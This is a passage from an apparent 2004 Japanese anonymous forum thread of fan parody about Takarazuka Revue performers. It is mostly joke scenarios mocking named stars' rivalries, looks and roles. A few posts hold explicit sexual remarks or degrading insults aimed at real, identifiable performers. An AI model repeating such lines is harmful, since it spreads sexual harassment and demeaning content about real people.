必死でたてにブンブンと首を振る宙組子たち@背後に醍○秘密警察がずらり

153 :名無しさん@花束いっぱい。:04/03/24 21:28 ID:hqD9cob9
「宙ってなんすか〜?」と、自分はてっきり
總組に異動したと思ってる@春爛漫のタニ。

154 :名無しさん@花束いっぱい。:04/03/24 22:33 ID:ZmHOwzpr
「一人で縄跳びの練習でもしてろよ・・・」ぶつぶつつぶやく
不機嫌なアリス@DSがさあ、終わっちゃったよ・・・・。

155 :名無しさん@花束いっぱい。:04/03/24 22:47 ID:kIjJMRnB
お長夫人の、おな〜り〜

156 :名無しさん@花束いっぱい。:04/03/25 15:41 ID:FDEE0/zc
どうしてわたしの贔屓がさえこの下になんか出るのよ〜と悲鳴あげる
○○ファン。@あ〜ら相手が芸なしだと自分が一番目立ちまくっておいしい
限りですわよと細い目をますます細くするマリタン。

157 :名無しさん@花束いっぱい。:04/03/25 20:14 ID:bmaP2kXb
あれ〜?かしげさんもあさこさんも3文字だから
○○に入らないでつよ〜と悩むタニ。
芸名は漢字で二文字だろ…と思いつつも
口に出す気力すら残っていないミズ@雪の皆さんと箱男を観劇

158 :名無しさん@花束いっぱい。:04/03/25 20:24 ID:SHsoWxvt
花總 まり
これこそタカラジェンヌの芸名の鏡!と心で思うマリタン@安蘭けいがお気に入り。

159 :名無しさん@花束いっぱい。:04/03/25 20:24 ID:OnonowVZ
自分が月組だったらさえこさんの下だったんでつね〜と
なんにも考えずに言うタニに、「あるわけね〜」と小声で
つぶやくミズ@オマエモナ〜。

160 :名無しさん@花束いっぱい。:04/03/25 21:12 ID:TniZa8Ab
オヤジどものショボイつぶやきは聞き飽きたぜ!
とまだまだ「待ち」で手持ち無沙汰なアリス@酒は飲めない。

161 :名無しさん@花束いっぱい。:04/03/25 21:16 ID:8Wrqx2Pp
そんな2人を見て、ファントムではようやくこの月組感から
脱け出せるなと密かに思う遼河はるひ@でも樹里がやってくる〜

162 :名無しさん@花束いっぱい。:04/03/25 22:17 ID:79a6jxgj
以前来日公演あったよね。結構な人気だった。

163 :名無しさん@花束いっぱい。:04/03/25 22:35 ID:mvbCgEPS
次回宙組公演を前にして、故郷の駅で母親から、
「命を惜しむんじゃないよ。お国の為に、立派に戦って死ぬ覚悟で行くんだよ」
と言われ、そして同郷の人々から、
「花影アリス君、ばんざーい」
と見送られ、
「死んでたまるかい。今度こそ最後まで芝居に出てみせるぜい。
たとえ盗みをしても、人殺しをしても」
と意気込むアリス@配役未定

164 :名無しさん@花束いっぱい。:04/03/25 23:17 ID:TniZa8Ab
娘役に役なんでありませんわ!このワタクシ以外にね。
と微笑むマリタン@糸目が一ミクロン以下で肉眼ではもう見えませぬ…。

165 :名無しさん@花束いっぱい。:04/03/25 23:18 ID:3mwGmRBK
アリスは戦う前に吊るされるヨカーン@ニッコリ微笑む草凪萌

166 :名無しさん@花束いっぱい。 :04/03/26 03:42 ID:lHvOwU7u
ここは一致協力してアリスを闇へ…と仕掛けに張り切る
今だけ同期愛@まちゃみ&いづみ

167 :名無しさん@花束いっぱい。:04/03/26 21:42 ID:WdU6gKIm
次は私が闇に行くのかしら、とつぶやく下級生娘役@み〜んなノイローゼ

花總まりを慕い、気に入ってもらえれば0番ライトはアナタのものよ、とウソを吐くマリタン@0番ライトは私の物

168 :名無しさん@花束いっぱい。:04/03/26 22:03 ID:Xw83Oljc
0番ライトは魅力だけどまりたんはなぁ・・とつぶやく下級生男役@ほとんどウツ

169 :名無しさん@花束いっぱい。:04/03/26 22:13 ID:P7yJ/joL
皆、気をしっかりもって・・・段々慣れてくるから・・・
ショーで組まされてると、本当に0番ライトに近付いてくるから、
いつかくる未来に希望を持とうね・・・と呟く遼河はるひ@鬱組トップ

170 :名無しさん@花束いっぱい。 :04/03/26 23:22 ID:YIoBQ597
鬱組トプに励まされてますます鬱になる宙組下級生@遼河さん、鬱って辛いですね

171 :名無しさん@花束いっぱい。:04/03/26 23:45 ID:HnR0gcIe
えっ「鬱」って何て読むんでつか〜 何だか画数が多いでつね〜と万年脳天気タニ@アンタだきゃー例外

172 :名無しさん@花束いっぱい。:04/03/28 00:06 ID:0+2HQRn2
>>170
そして追い討ちをかけるように
「なぜモー娘。の高橋愛は宝塚を受験しなかったのか」
「「てるてる家族」の最終回のラストシーンについて考えなさい」という
なんら舞台と関係ないことを宿題に出され、ますます鬱になる宙組下級生。

173 :名無しさん@花束いっぱい。:04/03/28 00:11 ID:fTGvddCy
樹里を鬱組にいれるべきか 今から悩んでる遼河はるひ

174 :名無しさん@花束いっぱい。:04/03/28 00:46 ID:mZjdC+g/
でも樹里さんがきたらトプでいられなくなっちゃうかな・・・
鬱組トプの座が何故だかとても愛しい健気なはるひ@慣れから情へ

175 :名無しさん@花束いっぱい。:04/03/28 09:35 ID:olDsKEKX
鬱組娘役トプに誘われて、「わたくし、どうしたらよろしいでしょう」
と、言葉まですっかりマリタンな花影アリス。

176 :名無しさん@花束いっぱい。:04/03/28 15:46 ID:pux9kmY/
芝居の最後まで出れるなら、お引き受けしたいな@アリス

177 :名無しさん@花束いっぱい。:04/03/28 18:32 ID:ILdJIkGR
「あのぉ〜あたしがぁ〜」と
何時迄たってもラチがあかない男役から転向を試みて
自ら鬱組トップ娘役に立候補する十輝いりす@まーちゃんって呼んで。

178 :名無しさん@花束いっぱい。:04/03/28 18:35 ID:foIFE/9E
いりす君、キミは金属同好会会員だろう!とマヤさん@いつ発足するの?

179 :名無しさん@花束いっぱい。:04/03/28 18:56 ID:sAIXecu6
組長:樹里
トプ:あひ
娘トプ:まーちゃん(大)
娘トプ狙いの死に役子役:アリス
鬱組発足ケテーイ(・∀・)@目下の敵はタニでつ


180 :名無しさん@花束いっぱい。:04/03/28 19:43 ID:pux9kmY/
タニは躁組トプ予定でつ。

181 :名無しさん@花束いっぱい。:04/03/28 19:44 ID:U81NfixT
何で私鬱組の組長なん?私は躁組やないの?と
ちょっと納得のいかない樹里@あひ、ちょっとココ来て説明しーや

182 :名無しさん@花束いっぱい。:04/03/28 19:44 ID:FsEyinHy
http://tmp2.2ch.net/test/read.cgi/mog2/1079095140/

I円くれ。

183 :名無しさん@花束いっぱい。:04/03/28 19:45 ID:u9PlRgdT
これでやっといりすのお守りから開放される・・・。
嬉々として劇団に組替え願いを出す七帆ひかる

184 :名無しさん@花束いっぱい。:04/03/28 21:53 ID:MdHjLpgc
『七帆ひかるって誰ですの?読み方も「ななほひかる」でよろしいのかしら?』
とマリタンに言われ、自分も鬱組に入る決心を固めた七帆@お守りします

185 :名無しさん@花束いっぱい。:04/03/28 22:36 ID:ILdJIkGR
「まーちゃん(大)」が気にいった十輝いりす。
実は「まさちゃん(大)」でもあるんだ〜とあひ相手にご機嫌。
転向の意志はますます固く@稽古着スカートを製作中。



186 :名無しさん@花束いっぱい。:04/03/28 22:43 ID:mZjdC+g/
ねぇねぇ、アリスちゃん
あなたはまだ若いんだし、これから宙組トプになれる可能性だってあるわ。
だから鬱組トプなんて、引き受けるのやめちゃいなさいよ、ね。
と、声量と眼力と体力でアリスをなだめにかかるあひる大好き出雲組長
@誰にも渡さなくてよ!!

187 :名無しさん@花束いっぱい。:04/03/28 22:56 ID:CVhFfoHF
その恐さに「ハイ、そうですね。私、頑張ります!」と言ってしまったアリス@ハナフサが退団するわけ無いだろうがと、毒を吐く
その微かな表情の変化でアリスの気持ちが分ったハナフサ@早く闇に葬り去らねば・・・

188 :名無しさん@花束いっぱい。:04/03/29 00:48 ID:8p0Ve8X5
いつも通り、芝居の途中でアリスを早く闇に葬り去らねば・・・@宙組担当予定の脚本家

189 :名無しさん@花束いっぱい。:04/03/29 11:21 ID:4qIpGtS1
アリスがいなくなったから早く私の相手役決めなきゃな〜と
鬱組トップのあひ@「エ?!私でしょ?とまーちゃん(大)」

190 :名無しさん@花束いっぱい。:04/03/29 16:07 ID:kqvKS6fK
うっかりまーちゃん(大)の製作中の稽古用スカート生地に巻き込まれ
窒息寸前、息も絶え絶えになるアリス。
なんと緞帳用生地なので、巻き込まれると命取りらしい。
早く助けて〜ともがくアリス@誰も気付かない。

191 :名無しさん@花束いっぱい。:04/03/29 17:23 ID:lFpw5WY8
いつもの死ぬ役のお稽古ね、アリス@マリタン

192 :名無しさん@花束いっぱい。:04/03/29 21:56 ID:xvMEDA1d
アリスが危機になるとなぜか助けにくる桜乃彩音@魂の双子?

193 :名無しさん@花束いっぱい。:04/03/29 22:12 ID:uLluay4Z
アリスの心を開いて私が娘1になるのよ!@桜乃彩音
 けれどマリタンがいるわ・・・@涙目

ふん!私にかなう者などいなくてよと、マリタン@私は宝塚の財産。ベルばらなんか比じゃないわ

194 :名無しさん@花束いっぱい。:04/03/29 22:31 ID:aaG5fsKv
聞いちゃいないまーちゃん(大)@これからの時代、背が高くなくちゃだめよ

195 :名無しさん@花束いっぱい :04/03/29 22:40 ID:iNLuEwFG
娘役では高い方よ@負けず嫌いマリタン

196 :名無しさん@花束いっぱい。:04/03/29 23:02 ID:Bku32UYI
まー(大)VS マリタンの意味の無い争いをよそに
「どの子がいいかな〜、ランランラン♪」と
相手役選びにるんるんの遼河はるひ@鬱組トプにあるまじきハイテンション

あれ?アリスはどこ?ちょっと気に入っていたのに・・・ポッ(*^^*)

197 :名無しさん@花束いっぱい。:04/03/29 23:50 ID:l6bi1ujC
私はタニさんと躁組を作ってトップになります。
とアリス@変わり身早!!

198 :名無しさん@花束いっぱい :04/03/30 00:09 ID:14n2ntrZ
アリスの言葉を聞いてやっぱり鬱入る遼河はるひ@薬飲まなくちゃ・・・

199 :名無しさん@花束いっぱい。:04/03/30 09:29 ID:oCipXI64
あまりのレスの多さに人気がブレイクしたのかと目をこするさえこ。
これで俺のトップも早まったなと手ぐすねを引いて待つあさこ。@私の席はいつ
空くの?と顔を曇らせる水。僕の席はいつ空くの?と尻馬に乗るタニ。


200 :名無しさん@花束いっぱい。:04/03/30 09:34 ID:oCipXI64
わたしの席は永久に空きませんわと声たからかに宣言する女帝。

201 :名無しさん@花束いっぱい。:04/03/30 10:12 ID:NljzJOQd
「200は、間違っていますわ。わたしではなくわたくし、ですわ」
とカキコするまりたん。

202 :名無しさん@花束いっぱい。:04/03/30 11:37 ID:1oM6OsKb
耳栓使用・PCいじれないまーちゃん(大)には
200の叫びも、201のカキコもまったく響かず。
今日もあひさんの為にドレス選びに熱中@お薬、飲ませて差し上げますわ。
すっかり女帝語も板についてきた・・・

203 :名無しさん@花束いっぱい。:04/03/30 13:45 ID:fDkMkuke
誰にもかまってもらえない樹里@私だってお薬飲んで頑張ってるのに・・・

204 :名無しさん@花束いっぱい。:04/03/30 13:54 ID:Iie/p+kF
まーちゃん(大)は鬱っていうより、総天然じゃ…と思うが
ゆるい笑顔で微笑まれ、何も言い返せないあひ@お兄さんは辛いよ。

205 :名無しさん@花束いっぱい。:04/03/31 18:24 ID:mm2m5jZu
ブサイクで貧乏な商店の娘が年増になっても貧乏人のあさましさから金欲しさに
ストリップ小屋にしがみついている@特技は寝ることと脱ぐこと

206 :名無しさん@花束いっぱい。:04/03/31 19:27 ID:nkfEqmt1
鬱組の話題で盛り上がっている横で豚丼をかっこむのに忙しいかなみん

「僕も食べたいでつーー」同じく鬱組と無縁のタニ

207 :名無しさん@花束いっぱい。:04/03/31 20:19 ID:K9BRuPFF
豚丼にキムチも付ければ脂肪燃焼系の助けになるのに…
と思うが、決して口には出さずせっせとドンブリに白米を盛る
健気な下級生はモチロン演技@アリス


208 :名無しさん@花束いっぱい。:04/03/31 21:00 ID:xDzInhwf
かなみが豚丼食べに通う事で、急速に業績回復する牛野屋@かなみん常連

209 :名無しさん@花束いっぱい。:04/03/31 21:35 ID:K9BRuPFF
豚丼って美味しそう…もっと大きくなれるかなぁ〜と
かなみんの豚丼を一途に見つめるまーちゃん(大)@179cmのオンナ。

210 :名無しさん@花束いっぱい。:04/03/31 22:52 ID:09zdjqx5
よく考えるとまーちゃん(大)って私より背大きいんだった‥@鬱トップのあひ。

211 :名無しさん@花束いっぱい。:04/04/01 00:04 ID:7WEKQRXR
トウコを鬱組娘役トップにしようと目論むあひる

212 :名無しさん@花束いっぱい。:04/04/01 00:23 ID:x2tmDBO1
あたしも入団してから3センチくらい伸びました〜あひさんもきっと大丈夫!
と牛乳を10リットル(一日分)用意してくるまーちゃん(大)可愛いヤツ。
いっそ牛乳風呂に入ろうかな…とエリザごっこを思い付くあひ@ちょっとウキウキ。

213 :名無しさん@花束いっぱい。:04/04/01 00:41 ID:Rpoj9yJ8
何も考えずに「鬱」という字が書けるあひ@それに気づき更に鬱。

214 :名無しさん@花束いっぱい :04/04/01 00:46 ID:EuDrDiim
当然「鬱」なんて難しい字は書けないタニ@かんじのべんきょうしますでつ!

215 :名無しさん@花束いっぱい:04/04/01 01:21 ID:amfprt3r
今年の音楽学校合格者の中から将来有望そうな娘役になりそうな
子達をチェックして楽屋に呼び出すまりたん@悪い芽は早めに摘まなくては

216 :名無しさん@花束いっぱい。:04/04/01 01:25 ID:41qCEP/C
5月の半ばには半数まで減っている92期生@娘役は全員いりませんわ

217 :名無しさん@花束いっぱい。:04/04/01 01:35 ID:A3VBA0Im
最近、wowowで宇宙戦艦ヤマトやってまつよ〜@タニ

218 :名無しさん@花束いっぱい。:04/04/01 10:42 ID:Ej9BxVQ2
「スサノオ」の「大和よ〜」が聞こえるたび「呼んでるでつ」と雪組稽古場に走るタニ。
タニを連れ戻すという名目で自分も一緒に来てしまうカシゲ「コムちゃーん」
なかなか戻らない二人を引きずって帰るわたる。
タニが来るたびに隠れるミズ@でも長い顎が見えてまつよ〜

219 :名無しさん@花束いっぱい:04/04/01 17:15 ID:Cb7HioSm
私の舞台の客席は永久にガラガラ空きだわと声たからかに宣言するさえこ。




220 :名無しさん@花束いっぱい。:04/04/01 17:18 ID:7J2ZxsSI
>サエコ
違う!!!@飢えだりじちょ(エリザベート)

221 :名無しさん@花束いっぱい。:04/04/01 21:02 ID:x2tmDBO1
ワタクシ(とワタクシの宙組)以外の話題なんて無礼千万、価値無しですわ
と、セリ上がりの満足も半減のマリタン@ぷんぷん

222 :名無しさん@花束いっぱい。:04/04/01 21:29 ID:iF4pCaZW
>飢えだ利自著
もうタカラヅカの経理は5組維持が不可能です。
全部まとめて、宙組ひとつに致しなさい@まりたん

223 :名無しさん@花束いっぱい。:04/04/01 21:35 ID:nlHIhYSW
「宙組ひとつくらいならアテクシが面倒みて差し上げましてよホホホ
 ああ、そうそう、それから
 タカコさんおひとりくらい、一生めんどうみて差し上げますわ(はあと)」
と、高笑いするまりたんの横で必死に経費を試算する醍○家じいや

224 :ジェンヌたんも将来貰えるよ:04/04/01 22:52 ID:uAHPXWi8
なら国民年金払え@社会保険庁


225 :名無しさん@花束いっぱい:04/04/02 01:32 ID:7yw5sO8d
宝塚歌劇団は組の前に全員が組子である前にまり組の一員であることを
90周年で改めて確認しましてよ、餓恵多さん貴方もでしてよ。@
世の中力のあるものが笑いますわ!お〜ほほほほほほほほほほほほほほほほほ

226 :名無しさん@花束いっぱい。:04/04/02 12:48 ID:mZ/Nqov0
おなめ!@まりたん

227 :名無しさん@花束いっぱい。:04/04/03 02:14 ID:Eyz6XbGX
そんなわけで、生徒全員によるラインダンスを企画するはなちゃん&石田先生。
(って、どういうわけや)

228 :名無しさん@花束いっぱい。:04/04/03 08:54 ID:3a2vdtUL
ああっ、ラインダンスといえば、「コートダジュール」での
わたくしのラインダンスのかわいらしかったこと……と思い出に
ひたるまりたん。

229 :名無しさん@花束いっぱい。:04/04/03 09:10 ID:Y2jvBbc3
あの頃は生娘でしたわ。今もだけど@はなたん

230 :名無しさん@花束いっぱい。:04/04/04 09:08 ID:+kwpa29d
たかこさん、ちゃんとカキコしてくださらないと、昨日の朝以来
さがりっぱなしですわ!!
気合を入れるまりたん。

231 :名無しさん@花束いっぱい。:04/04/04 13:55 ID:Hfr6IX4f
愛しのたかこさんの顔を見て、速攻気合いが入るまりたん
@やっぱり誰にも渡さなくてよ!

232 :名無しさん@花束いっぱい。:04/04/04 14:45 ID:0idH2zpt
退団後「狸御殿」に出演する花總まり(と和央ようか)。
花總がきぬた姫に対しその他大勢の和央ようか。

233 :名無しさん@花束いっぱい。 :04/04/04 15:30 ID:N377Wavh
「あら、ワタクシは生涯トップですわよ」と素で思ってるマリタン@232は抹殺ですわ

234 :名無しさん@花束いっぱい。:04/04/04 17:25 ID:J6/wxAbW
在団中でも主演する花總まりとその他大勢の(和央ようか)

235 :名無しさん@花束いっぱい。:04/04/04 18:34 ID:AeTpFCaJ
次回公演の配役について、飢えだ利自著からお伺いを受けるまりたん。

236 : 名無しさん@花束いっぱい。 :04/04/04 20:00 ID:mSpY/2YE
ワタクシが主演で綺麗な衣装が着替え放題、ソロで歌って踊ってセリ上がる
そんな感じならよろしくてよ、と慈母の微笑み@寛容なマリタン。

237 :名無しさん@花束いっぱい。:04/04/04 22:24 ID:/0xoXi/h
2004/04/05
宙組在団者のお知らせ

下記の生徒の在団発表がありましたのでお知らせいたします。

(宙組)

 和央 ようか
 花總 まり


238 :名無しさん@花束いっぱい。 :04/04/04 23:11 ID:PS46RKHJ
「237さんはワタクシ(とタカコさん)が退団するのがお嫌ですのね。
あなたには醍醐家の力で1列センター席をプレゼントいたしますわ」
とマリタン@安心なすって。まだまだ現役で頑張りますわ

239 :名無しさん@花束いっぱい。:04/04/04 23:24 ID:3vswMg/E
2004/04/05
宙組在団者のお知らせ

下記の生徒の在団発表がありましたのでお知らせいたします。

(宙組)

 和央 ようか
 花總 まり

2014年4月1日100周年記念式典にて退団。


240 :名無しさん@花束いっぱい。:04/04/05 00:08 ID:y36puWXA
こちらは「こんな○○は嫌だ」スレですから
皆様2014年でもわたくし達が退団するのはお嫌なんですわね
期待にお応えしてまだまだがんばりますわと宣うまりたん

2014でも解放してくれないのかと頬がげっそりこける和央ようか

241 :名無しさん@花束いっぱい。:04/04/05 17:30 ID:lDv2ETMv
>>240

そう、その様に頬をへこますように強く吸って・・・、あ、上手@まりたん

242 :名無しさん@花束いっぱい。:04/04/05 18:19 ID:vEVsN8xO
もう逃げ出す気力もない和央ようか@心の支えの下級生男役が続々退団していっちゃう・・・

243 :名無しさん@花束いっぱい。:04/04/05 23:32 ID:IREF8j+V
菊田一夫演劇賞受賞などは屁とも思わず、人間国宝を狙ってるマリタン@別名重要無形文化財でしてよ

244 :名無しさん@花束いっぱい。:04/04/06 00:33 ID:nyeOLKhv
>>241

そう、そして口をすぼめて、舌を丸めてとがらせて、ずっと奥まで・・・ん、あん

245 :名無しさん@花束いっぱい。:04/04/06 03:21 ID:0rQ/xvZE
なぁーにしてるんでつか?@何もわかっちゃいない雰囲気ぶち壊し屋タニ。すっかりその気になっていた和央。目が光りだすマリタン。

246 :名無しさん@花束いっぱい:04/04/06 12:00 ID:VYG/bQkC
宙トップコンビの異常な長さと、さえこトップへの怒りがどす黒いとぐろを
巻いて飢えだのお尻を直撃した。1m位吹っ飛んだ飢えだは地面に這いつくばって
叫び続けた。まるでコペル二クスのように。@俺は正しい.それでも地球は俺を
中心に回っていると。


247 :名無しさん@花束いっぱい:04/04/06 19:11 ID:snDtmcD0
>246はエスプリが効いていて好きだわと喜ぶ飢えだ嫌いのジェンヌとファン@1人で笛を吹き
太鼓を叩き、踊りを踊って、一人芝居をやりながら、1歩づつ後退するうえだ過激団

248 :名無しさん@花束いっぱい :04/04/06 19:29 ID:NTJekCoj
皆さん、おバカさんね。地球はワタクシを中心に回ってますのよ。
と、子供の頃から真剣に信じているウブなマリタン@涙目で頷くタカコ&うえだ。

249 :名無しさん@花束いっぱい。:04/04/06 20:23 ID:y4i24FAv
地球は私を中心に回ってるのよ…と言ってみるガイチ@アマテラス
私は地球を中心に回ってるのですね、と壮@月読

250 :名無しさん@花束いっぱい。:04/04/06 20:45 ID:+9sID7uD
アリス@1人であんみつ屋
白玉の数が少ないわ!とご機嫌斜めモード。

251 :名無しさん@花束いっぱい。:04/04/06 21:24 ID:AFL+dF1Y
かなみん@一人でマック
ポテトの本数が少ないわとクレームを付け
もいっこおまけにもらってしまいご満悦モード

252 :名無しさん@花束いっぱい:04/04/06 22:12 ID:iIrk81YC
コム雪から月全ツへとエスカレートする客離れ。全体像が見れなくて
あーでもないこーでもないと重箱の隅をつっつきながら井戸端会議を
ネットで続けるヅカファン。@ヅカファンはアホが多いからまだまだヅカは
安泰じゃと胸をなでおろす飢えだとハム。


253 :名無しさん@花束いっぱい。:04/04/06 23:30 ID:qtrowDFB
たかこさん、クンニしてあげるから許して

254 :名無しさん@花束いっぱい。:04/04/07 01:19 ID:IxhFCWC5
下品な253は一体どなたですの?!とたかこを後ろ手にかばい、
糸目ビームをそこら中に発射しまくるまりたん

255 :名無しさん@花束いっぱい。:04/04/07 20:18 ID:rYwHkvRk
糸目ビーム直撃を受け黒こげになってしまった飢えだリジチョ

まあ大変、ではワタクシが責任を持って次の理事長に就任いたしますわ@ハリキリまりたん

256 :名無しさん@花束いっぱい。:04/04/07 22:34 ID:IprtwwTw
「糸目のおばさんは、どいたどいたーーー!!」
イトーメ・ビームを、かいくぐるのは得意なアリスタン。
便乗して、かいくぐって遊ぶタニ。

257 :名無しさん@花束いっぱい。:04/04/08 02:02 ID:Xp52Ix9t
「栄養失調の小娘は、どいたどいたーーー!!」
あたるを幸い跳ね飛ばす、かなみん。

258 :名無しさん@花束いっぱい。:04/04/08 10:32 ID:gpeQGOTM
かなみんの体当たりvsまりたんの糸目ビーム……どちらが怖いかアンケートを
とるタカコと水。
「どっちも」と書き込むタニ。その後ろに「イラナイ」と小さく書き込むアリス。

259 :名無しさん@花束いっぱい。:04/04/08 13:04 ID:T4PM/8j8
すっかり小声の毒づきキャラが定着したアリスに、
組を束ねる娘1の責務として、
「なにか不満でもあるの、アリス?」
と訊ねるまりたん@超越的キング オブ 娘役

260 :名無しさん@花束いっぱい。:04/04/08 13:22 ID:q1yU6eYy
「いいえ、何も・・・」と答えるアリス@不満のかたまり

261 :名無しさん@花束いっぱい。:04/04/08 17:42 ID:RAn+nkJe
アンタが娘1なのが今の最大の不満よ!と、言いたくても言えないアリス@円形脱毛症、もぅ3個目
タカコの方は精神安定剤服用@脱毛さえも通り越す

262 :名無しさん@花束いっぱい。:04/04/08 20:28 ID:1H7MzDhp
それじゃあタカコさん、はげなんでつかー?無邪気なタニ@声大きすぎ

263 :名無しさん@花束いっぱい。:04/04/08 20:31 ID:RAn+nkJe
違うわよ、タカコさんは女帝の相手役でしょ。髪は抜けないの。女帝はハゲが嫌いだからね。と、組長@私はアデランス

264 :名無しさん@花束いっぱい。:04/04/08 20:35 ID:zWUC2sJN
自分が髪が薄いから?と
小声のつもりが大声でタニに訪ねるまだまだ10代@迂闊なアリス

265 :名無しさん@花束いっぱい。:04/04/08 20:47 ID:DZ/N51AG
任期ならわたくしも10代ですわよと余裕の笑顔のマリタン@アリスには4個目ドゾーーーー

266 :名無しさん@花束いっぱい。:04/04/08 20:58 ID:KisggEig
ちょっぴり胸を撫で下ろしたかしげ@宙に行くわけじゃないけど

267 :名無しさん@花束いっぱい。:04/04/08 21:24 ID:1H7MzDhp
ぶっさんは目尻の小皺が四つめでつねーーとさらに大声で言うタニ@命知らず

268 :名無しさん@花束いっぱい。:04/04/08 23:09 ID:gpeQGOTM
「ぶっさんてどなたのことかしら?」とにっこり微笑みながらタニを相手役名簿から抹殺するまりたん

269 :名無しさん@花束いっぱい。:04/04/08 23:47 ID:oxRerDCe
私も『ぶっさん』なんかとは共演したくないなーと震える声で呟くミズ@次の婿はイヤーーーーー

270 :名無しさん@花束いっぱい。:04/04/08 23:56 ID:1H7MzDhp
ミズさん!狸組に永遠に特出を命じますわ!怒髪天をつくまりたん@地獄耳

271 :名無しさん@花束いっぱい。:04/04/09 00:28 ID:zB5aif86
必ず幸せになれる!と言うふれこみで
「ぶっさん」という謎の呪文が流行る@宙の男役

デビルイヤーとデビルビームはやっぱりセットでつかねーと
楽しそうに大声で話すタニ@次はデビルウィング?とご機嫌。

272 :名無しさん@花束いっぱい。:04/04/09 01:10 ID:dNW3FGNB
デビルカッターを忘れてるよタニ、とそっとデビルカッターを渡すミズさん@標的はぶっさん


273 :名無しさん@花束いっぱい。:04/04/09 01:13 ID:e6U7WOM4
「相手役」と聞くとタカコを思い浮かべる宙組子
@宙に嫁はいない、いるのは婿のみ!

274 :名無しさん@花束いっぱい。:04/04/09 12:50 ID:/lKzvTqC
入り婿もいいかもね@まりたん

275 :名無しさん@花束いっぱい。:04/04/09 14:47 ID:GGEh5Y7g
「BOXMAN―俺に破れない金
庫などない―」の演技に対して「第29回菊田一夫演劇賞」を受賞!

これからもワタクシはタカコと共に数々の賞を受賞できるように頑張りますわ@誇らしげ、退団する気なし

ズンコさん、貴女はどうやって退団する事が出来たの?と、タカコ@イチロさんもどうして??


276 :名無しさん@花束いっぱい。:04/04/09 16:54 ID:XeFD+pZ1
初心にかえって新公クリス役に立候補するまりたん。
おかげでいまだに配役発表できません・・・・。

277 :名無しさん@花束いっぱい。:04/04/09 17:24 ID:/lKzvTqC
初心にかえって死ぬ役に立候補するアリス。
おかげでいまだに演出家はアリスの配役が楽です・・・。

278 :名無しさん@花束いっぱい。:04/04/09 21:09 ID:YvFCiwlU
初心にかえって研1からやり直すことにしたタニ@違和感なし

279 :名無しさん@花束いっぱい。:04/04/09 21:28 ID:x+WzzigA
醗酵の美少女が板につきまくりのアリス@今夜は熱燗でクイッ!

ぶっさんの昔のDVD見ながら
「私はこのときまだ小学生だったわあ♪
ぶっさん、こんな時から??(´0ノ`*)オーホッホッホ」
と高笑いのアリス@熱燗もう一本。




280 :名無しさん@花束いっぱい。:04/04/09 23:54 ID:U2tSA7cv
アリスたん、腐ってるんでつか!>醗酵@279

281 :名無しさん@花束いっぱい。 :04/04/09 23:59 ID:MbgCdU5L
ワタクシ以外の娘役は皆腐ってますわ@マリタン

282 :名無しさん@花束いっぱい。:04/04/10 00:55 ID:VkO/H5GQ
醗酵は役に立つけど、腐敗はダメダメ!
とマリタンをみながら呟くまりえった@治外法権。

283 :名無しさん@花束いっぱい。:04/04/10 01:17 ID:bWpy3+rU
夭逝の美少女が板につきまくりのアリス@今夜はタフマンをぐいっ!

284 :名無しさん@花束いっぱい。:04/04/10 14:09 ID:enGgqWTs
>夭逝の美少女が板につきまくりのアリス@今夜はタフマンをぐいっ!

 ↑「なんて読むんでつか?」
ぶっさんに直球質問@研究科10年のタニ怖いものなし。


285 :名無しさん@花束いっぱい。:04/04/10 18:48 ID:A618ofTD
そしてタニ専属家庭教師ミズがよびだされる・・・・

286 :名無しさん@花束いっぱい。:04/04/10 20:11 ID:O1tvilME
喪神の美少女が板につきまくりのアリス@今夜は向かいの踊り子の姉さんの話しで脅迫して一杯クイッ!

287 :名無しさん@花束いっぱい。:04/04/10 20:56 ID:GM0syaCA
退団後婿入りして嫁の実家経営会社の役員となり身を粉にして働けど、
義理の親、兄弟から「種無しかぼちゃ」といびられる和央ようか。

288 :名無しさん@花束いっぱい。:04/04/10 21:57 ID:KAN3WmSl
あまりに不憫なタカコを見て専科に誘う轟理事

289 :名無しさん@花束いっぱい。:04/04/10 23:09 ID:fwzITuSb
「あらま、ワタクシなら間に合っていますわよ」
聞かれもしないのに(*・ω・*)に答えるマリタン@20年後なら考えてよくてよ。

290 :名無しさん@花束いっぱい。:04/04/11 11:20 ID:SBzbUmY9
そう、指で乳首をこねながら舌を埋めて、吸って。ん、あ・・いい

291 :名無しさん@花束いっぱい。:04/04/11 11:23 ID:7072Y/98
シモネタに飢えている粘着が一人いまつね、と冷静に分析する水@やっぱりこんなポジション

292 :名無しさん@花束いっぱい。:04/04/11 14:15 ID:LpBu8UXE
実は291のミズはつけあごをしてみたタニ

293 :名無しさん@花束いっぱい。:04/04/12 00:35 ID:UWiLwqCm
今、東宝は花組公演でしてよ。
花組生徒にもネタを振ってください。
宙は今、公演してないでしょ@オサ

294 :名無しさん@花束いっぱい。:04/04/12 00:38 ID:Sj5jlK0b
彩音!!早く書きこみないよアンタ花でしょ??@叱咤激励メールを彩音に送るアリス今夜はロンリー。

295 :名無しさん@花束いっぱい。:04/04/12 00:41 ID:szs5vcGU
それじゃあ花娘1のことでも誉めるか……と思ってみたものの、
キーボードをうつ指が止まったまま動かない彩音@正直者


296 :名無しさん@花束いっぱい。:04/04/12 00:50 ID:UWiLwqCm
彩音!そういう時は、悪口書けばいいんだよ@アリス

297 :名無しさん@花束いっぱい。:04/04/12 05:22 ID:pA4XzA00
そんな卑しい心根ではワタクシの後継者(候補)にはなれませんわよ!
とアリスに優しく助言するマリタン@糸目菩薩の微笑

298 :名無しさん@花束いっぱい。:04/04/12 08:49 ID:63bOGB8V
さっそく宙組スレに戻ってしまった事を実感するオサ


299 :名無しさん@花束いっぱい。:04/04/12 21:57 ID:Sj5jlK0b
アヒャーン゚(゚´Д`゚)゜。所詮ここには居場所なんてないんだあぁぁ!!

中東版に・・中東版に・・逝ってやるうぅぅ!!!

同期なのに、糸目ブサンに強気に出られないオサ@幼児退行

300 :名無しさん@花束いっぱい。:04/04/12 22:10 ID:ewX9gW3g
自分の居場所は自分で作るものでしてよ@ワタクシの居場所は永遠に・・・

301 :名無しさん@花束いっぱい。:04/04/12 22:15 ID:zvGCEZwK
オサのあたまをなでなでしながら連れ帰るチハル兄貴

その様子を目で追ってしまうタカコにきらりと光るぶっさんの糸目・・・

302 :名無しさん@花束いっぱい。:04/04/13 02:29 ID:JhbjKStJ
彩音!!アンタがネタ振りしないからこうなるんだよ@ダメ出しアリス( ̄△ ̄)/□

303 :名無しさん@花束いっぱい。:04/04/13 05:05 ID:hOqwHWpF
おかまの人って詳しい・・・

【ぶっ】 タ カ ラ ヅ カ 九〇周年 【さん】

http://love2.2ch.net/test/read.cgi/gay/1081212058/l50

